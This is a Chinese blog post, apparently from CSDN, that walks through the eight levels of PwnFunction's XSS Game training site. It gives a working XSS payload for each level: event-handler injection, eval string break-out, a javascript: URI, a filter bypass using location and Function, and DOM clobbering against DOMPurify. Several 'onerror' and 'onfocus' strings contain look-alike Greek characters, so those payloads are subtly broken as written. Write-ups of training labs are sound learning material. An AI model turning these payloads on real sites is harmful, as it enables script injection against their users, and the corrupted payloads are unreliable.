dom破坏案例

 

目录

1、Ma Spaghet!

2、 Jefff

 3、Ugandan Knuckles

4、Ricardo Milos

5、Ah That's Hawt

6、Ligma

7、Mafia

8、Ok, Boomer


网址:XSS Game - Learning XSS Made Simple! | Created by PwnFunction

1、Ma Spaghet!

由题目可知get传参的函数是somebody,因此由此注入

?somebody=<img%20src=1%20οnerrοr="alert(1337)">

2、 Jefff

根据题目可知出现eval函数可尝试进行闭合破解

?jeff=";alert(1337);"

 3、Ugandan Knuckles

看到input可以尝试引号闭合 并可以使用onclick函数点击触发,但这个函数是交互式的,需要点击才能触发,因此需要用到onfocus函数,并用autofocus进行主动对焦

onfocus:

获取焦点事件

?wey="οnfοcus=alert(1337)%20autofocus=" 

4、Ricardo Milos

 get传参传到action,action有伪协议javascript

?ricardo=javascript:alert(1337)

 

5、Ah That's Hawt

与第一题类似,但是此题过滤了括号,因此需要用location将过滤的转换

?markassbrownlee=<img src=1 οnerrοr=location="javascript:alert%25281337%2529">

6、Ligma

 get传参过滤大小写字母以及数字,可用jsfuck进行编码然后再进行url编码

7、Mafia

此题过滤了基本上是符号,也限制了长度50,也过滤了alert,可以通过构造函数去做

Function(/ALERT(1337)/.source.toLowerCase())()

因为小写的alert会过滤因此用大写,并用toLowerCase()将大写转换成小写,转换是过滤后执行不是过滤前执行

 

8、Ok, Boomer

 此题用了一个很强大的安全框架DOMPurify,

页面的值可以用id和name取出来,如果没有我们可以找其他的对其进行覆盖,对其进行重新取值,便可以取出。

<a id=ok href=tel:alert(1337)>

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值